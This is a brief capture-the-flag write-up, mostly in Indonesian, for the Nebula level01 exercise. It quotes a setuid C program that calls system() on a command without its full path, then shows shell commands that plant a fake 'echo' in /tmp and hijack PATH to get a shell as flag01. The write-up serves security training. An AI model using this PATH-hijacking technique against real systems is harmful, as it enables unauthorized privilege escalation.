Exploit-Exercises Nebula - Level01

Executive Summary

Challenge level01 exploit-exercise adalah melakukan modifikasi pada $PATH sehingga dapat melakukan arbitary execution

About

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it? To do this level, log in as the level01 account with the password level01. Files for this level can be found in /home/flag01.

Source code

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  gid_t gid;
  uid_t uid;
  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  system("/usr/bin/env echo and now what?");
}

Proof Of Concept

Pada source code .c diatas terdapat bug pada system("/usr/bin/env echo and now what?") yang pada command echo tidak menggunakan PATH lengkapnya, sehingga kita dapat membuat file baru bernama echo yang berisikan /bin/bash dan memodifikasi $PATH agar file ‘evil echo’ yang kita buat dapat tereksekusi dan mendapatkan shell access sebagai user flag01.

sh-4.2$ echo "/bin/bash" > /tmp/echo
sh-4.2$ chmod +x /tmp/echo
sh-4.2$ export PATH="/tmp/":$PATH
sh-4.2$ ./flag01
[email protected]:/home/flag01$ getflag
You have successfully executed getflag on a target account